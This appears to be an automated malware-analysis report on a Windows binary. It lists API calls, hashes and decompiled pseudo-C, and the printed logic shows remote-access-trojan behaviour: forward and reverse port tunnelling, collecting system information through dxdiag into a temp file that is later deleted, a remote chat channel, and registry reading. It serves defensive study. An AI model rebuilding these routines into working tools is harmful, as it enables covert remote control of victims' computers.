                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@std@@@std@@$?c_str@?$basic_string@V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_ofstream@??6std@@?close@?$basic_ofstream@?is_open@?$basic_ofstream@CloseD?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteExecuteFileHandleObjectShellSingleV01@@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                                                                                • String ID: <$@$Temp
                                                                                • API String ID: 2271834883-1032778388
                                                                                • Opcode ID: cb6fefabf1ec3bccb2c3b11d9f250ac462e1d498c0f409a9ba22c47d5ba8a27d
                                                                                • Instruction ID: 888aea03b1af4e5dcc25ad03cf8797eeef26072084273f227dd45585e2e759a8
                                                                                • Opcode Fuzzy Hash: cb6fefabf1ec3bccb2c3b11d9f250ac462e1d498c0f409a9ba22c47d5ba8a27d
                                                                                • Instruction Fuzzy Hash: E541407190061DEBDB10EFE0DC4AAEE7B79EF44701F10403AF502A6190DBB45A89CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _wgetenv.MSVCRT ref: 0040E93E
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,00000000), ref: 0040E949
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040E954
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E95F
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,/t ,?,00000000,00000000), ref: 0040E976
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000), ref: 0040E980
                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,?,00000000), ref: 0040E992
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000,00000000), ref: 0040E99B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000), ref: 0040E9A8
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000000,00000000), ref: 0040E9B7
                                                                                  • Part of subcall function 00412DDF: CreateFileW.KERNELBASE(000177DE,80000000,00000003,00000000,00000003,00000080,00000000,00000000,000177DE,?,00409C9F,00000000), ref: 00412DF9
                                                                                • Sleep.KERNEL32(00000064,00000000,00000000), ref: 0040E9C7
                                                                                • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9D1
                                                                                • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040E9E6
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E9F7
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 0040E9FE
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040EA3C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040EA46
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000097,?,?,?,?,?,?), ref: 0040EA5E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA77
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA80
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040EA89
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@std@@$G@2@@std@@$??1?$basic_string@D@2@@std@@$Hstd@@V?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@?empty@?$basic_string@D@2@@0@FileG@2@@0@V10@0@$CreateD@1@@DeleteExecuteG@1@@ShellSleepV10@V10@@_wgetenv
                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                • API String ID: 1966616101-2001430897
                                                                                • Opcode ID: 0c8f4e8c70904f7bdee29dd924357dab0b938e99ad2a055fbd56a69606e32820
                                                                                • Instruction ID: 1c5eb7ae2d6a6dc7204c520a9e58a8966c6b8e2557f2cc0bdb06ecab60d4e380
                                                                                • Opcode Fuzzy Hash: 0c8f4e8c70904f7bdee29dd924357dab0b938e99ad2a055fbd56a69606e32820
                                                                                • Instruction Fuzzy Hash: 0D41657280050DEFCB04EBE0ED4ADEEB77CEE54345B10402AF912A3091EB755A49CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A383
                                                                                • SetEvent.KERNEL32(?), ref: 0040A38C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040A395
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 0040A3AD
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040A3BE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040A3CD
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • #12.WS2_32 ref: 0040A41B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A42E
                                                                                • atoi.MSVCRT ref: 0040A435
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A472
                                                                                • atoi.MSVCRT ref: 0040A479
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040A4A6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040A544
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415B18), ref: 0040A56E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415B18), ref: 0040A578
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00415908), ref: 0040A5AB
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0041B310,00415908), ref: 0040A5B5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000085,?,?,?,?,0041B310,00415908), ref: 0040A5CC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5DD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00415908), ref: 0040A5E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$?c_str@?$basic_string@D@2@@0@Hstd@@V?$basic_string@$?length@?$basic_string@V12@$?substr@?$basic_string@V10@V10@0@atoi$??4?$basic_string@?find@?$basic_string@D@1@@EventV01@
                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                • API String ID: 2416847206-168337528
                                                                                • Opcode ID: 54903d741be3d62d167bfcda20e71c9ca57bccbd701edb3687dbc58f6fe870c6
                                                                                • Instruction ID: b25c6e2405df25c2c81854c085642773db686a1d66d7f735eb38a539f85e00a7
                                                                                • Opcode Fuzzy Hash: 54903d741be3d62d167bfcda20e71c9ca57bccbd701edb3687dbc58f6fe870c6
                                                                                • Instruction Fuzzy Hash: 3C61A371900309ABDB08BBB1EC4A9EE3B78FB54305F00853AF512A31E1EB78555487AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 34%
                                                                                			E0040295E(void* __eflags, intOrPtr _a4, char _a7) {
                                                                                				char _v5;
                                                                                				void* _v12;
                                                                                				char _v28;
                                                                                				void* _v44;
                                                                                				char _v60;
                                                                                				char _v76;
                                                                                				char _v92;
                                                                                				struct tagMSG _v120;
                                                                                				int _t29;
                                                                                				void* _t35;
                                                                                				intOrPtr _t41;
                                                                                				void* _t45;
                                                                                				void* _t50;
                                                                                				void* _t51;
                                                                                				void* _t62;
                                                                                				void* _t63;
                                                                                				intOrPtr _t95;
                                                                                				void* _t97;
                                                                                				void* _t101;
                                                                                				void* _t104;
                                                                                				void* _t105;
                                                                                				void* _t107;
                                                                                
                                                                                				_t107 = __eflags;
                                                                                				_t95 = _a4;
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_t95 + 0x18);
                                                                                				_t29 = SetEvent( *(_t95 + 0x28));
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				E004129EB(_t107,  &_v28,  &_v76, 0x41b310,  &_v76, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                                                                				_t104 = _t101 + 0x24;
                                                                                				_t97 =  *_t29 - 0x3a;
                                                                                				if(_t97 == 0) {
                                                                                					_t35 = E0040180C( &_v28, __eflags, 0);
                                                                                					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                					_t62 = E00406DD9(_t35);
                                                                                					__eflags = _t62;
                                                                                					if(_t62 == 0) {
                                                                                						L12:
                                                                                						E004017DD( &_v28);
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                						__eflags = 0;
                                                                                						return 0;
                                                                                					}
                                                                                					 *0x41b794 = E00407033(_t62, "DisplayMessage");
                                                                                					 *0x41b798 = E00407033(_t62, "GetMessage");
                                                                                					_t41 = E00407033(_t62, "CloseChat");
                                                                                					_t105 = _t104 + 8;
                                                                                					 *0x41b79c = _t41;
                                                                                					 *0x41b790 = 1;
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                					E004020C2(_t95, 0x74, 0x41b738);
                                                                                					L10:
                                                                                					_t63 = HeapCreate(0, 0, 0);
                                                                                					_t45 =  *0x41b798(_t63,  &_v12);
                                                                                					__eflags = _t45;
                                                                                					if(_t45 != 0) {
                                                                                						_t105 = _t105 - 0x10;
                                                                                						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t45,  &_v5);
                                                                                						E004020C2(_t95, 0x3b, _v12);
                                                                                						HeapFree(_t63, 0, _v12);
                                                                                					}
                                                                                					goto L10;
                                                                                				}
                                                                                				_t109 = _t97 != 1;
                                                                                				if(_t97 != 1) {
                                                                                					goto L12;
                                                                                				}
                                                                                				_t50 = E00412881( &_v92);
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v92, E0040180C( &_v28, _t109, 0));
                                                                                				_t51 =  *0x41b794(_t50);
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				if(_t51 == 0) {
                                                                                					goto L12;
                                                                                				}
                                                                                				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_a7);
                                                                                				E00412855( &_v60, _t104 - 0x10,  &_v60);
                                                                                				E004020C2(_t95, 0x3b, 0x41576c);
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				L4:
                                                                                				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
                                                                                					if(__eflags >= 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                				}
                                                                                				TranslateMessage( &_v120);
                                                                                				DispatchMessageA( &_v120);
                                                                                				goto L4;
                                                                                			}


                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402971
                                                                                • SetEvent.KERNEL32(?), ref: 0040297A
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402983
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 0040299B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004029AB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004029BA
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004029F5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402A08
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041576C,?), ref: 00402A22
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000003B), ref: 00402A45
                                                                                • GetMessageA.USER32 ref: 00402A52
                                                                                • TranslateMessage.USER32(?), ref: 00402A60
                                                                                • DispatchMessageA.USER32 ref: 00402A6A
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402A87
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B738,00000000,DisplayMessage), ref: 00402ADF
                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402AF1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402B17
                                                                                • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402B2B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B3E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B47
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$V01@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@G@1@@Heap$??2@??3@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeTranslateV01@
                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                • API String ID: 1701728818-749203953
                                                                                • Opcode ID: f86dce867839c44f2fe38f0c41830367d02e79be52a79e7338d7ba5c905a58a8
                                                                                • Instruction ID: 706d1787dbe5d31282a01ee588047493408fae45c62342a208237384888500fd
                                                                                • Opcode Fuzzy Hash: f86dce867839c44f2fe38f0c41830367d02e79be52a79e7338d7ba5c905a58a8
                                                                                • Instruction Fuzzy Hash: 75517F72A00608EBCB14ABE1ED4D9EE7B7CEF84355B10403AF502E31D1DBB85545CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 34%
                                                                                			E0040BE34(char _a4, short* _a20, intOrPtr _a24, char _a27) {
                                                                                				void* _v8;
                                                                                				char _v24;
                                                                                				char _v40;
                                                                                				char _v56;
                                                                                				char _v72;
                                                                                				char _v88;
                                                                                				char _v104;
                                                                                				char _v120;
                                                                                				char _v136;
                                                                                				char _v152;
                                                                                				void* _t28;
                                                                                				long _t29;
                                                                                				void* _t35;
                                                                                				char* _t38;
                                                                                				char* _t39;
                                                                                				char* _t40;
                                                                                				char* _t41;
                                                                                				char* _t42;
                                                                                				char* _t43;
                                                                                				char* _t44;
                                                                                				void* _t54;
                                                                                				void* _t56;
                                                                                				char* _t73;
                                                                                				void* _t77;
                                                                                				void* _t79;
                                                                                
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                				_t28 = E0040BD9B( &_a4);
                                                                                				_t79 = _t77 - 0x10 + 0x10;
                                                                                				_t47 = 0;
                                                                                				_t29 = RegOpenKeyExW(_t28, _a20, 0, 0x20019,  &_v8);
                                                                                				_t90 = _t29;
                                                                                				if(_t29 != 0) {
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                                                                					E004020C2(0x41bde0, 0x72, "3");
                                                                                				} else {
                                                                                					E0040BB20( &_v8, _t90, _v8);
                                                                                					_pop(_t54);
                                                                                					_t73 = "0";
                                                                                					if(_a24 != 0) {
                                                                                						_t73 = "1";
                                                                                					}
                                                                                					_t35 = E00412855(_t54,  &_v152, 0x41bdd0);
                                                                                					_t56 = 0x41b310;
                                                                                					_t38 =  &_v88;
                                                                                					L00414176();
                                                                                					_t39 =  &_v56;
                                                                                					L00414140();
                                                                                					_t40 =  &_v40;
                                                                                					L00414140();
                                                                                					_t41 =  &_v24;
                                                                                					L00414140();
                                                                                					_t42 =  &_v72;
                                                                                					L00414140();
                                                                                					_t43 =  &_v104;
                                                                                					L00414140();
                                                                                					_t44 =  &_v136;
                                                                                					L00414140();
                                                                                					L00414140();
                                                                                					E004020C2(0x41bde0, 0x71, _t79 - 0x10);
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t73, 0x41b310, E00412855(_t56,  &_v120, 0x41be40), 0x41b310, _t35, 0x41be30, 0x41b310, 0x41be50);
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
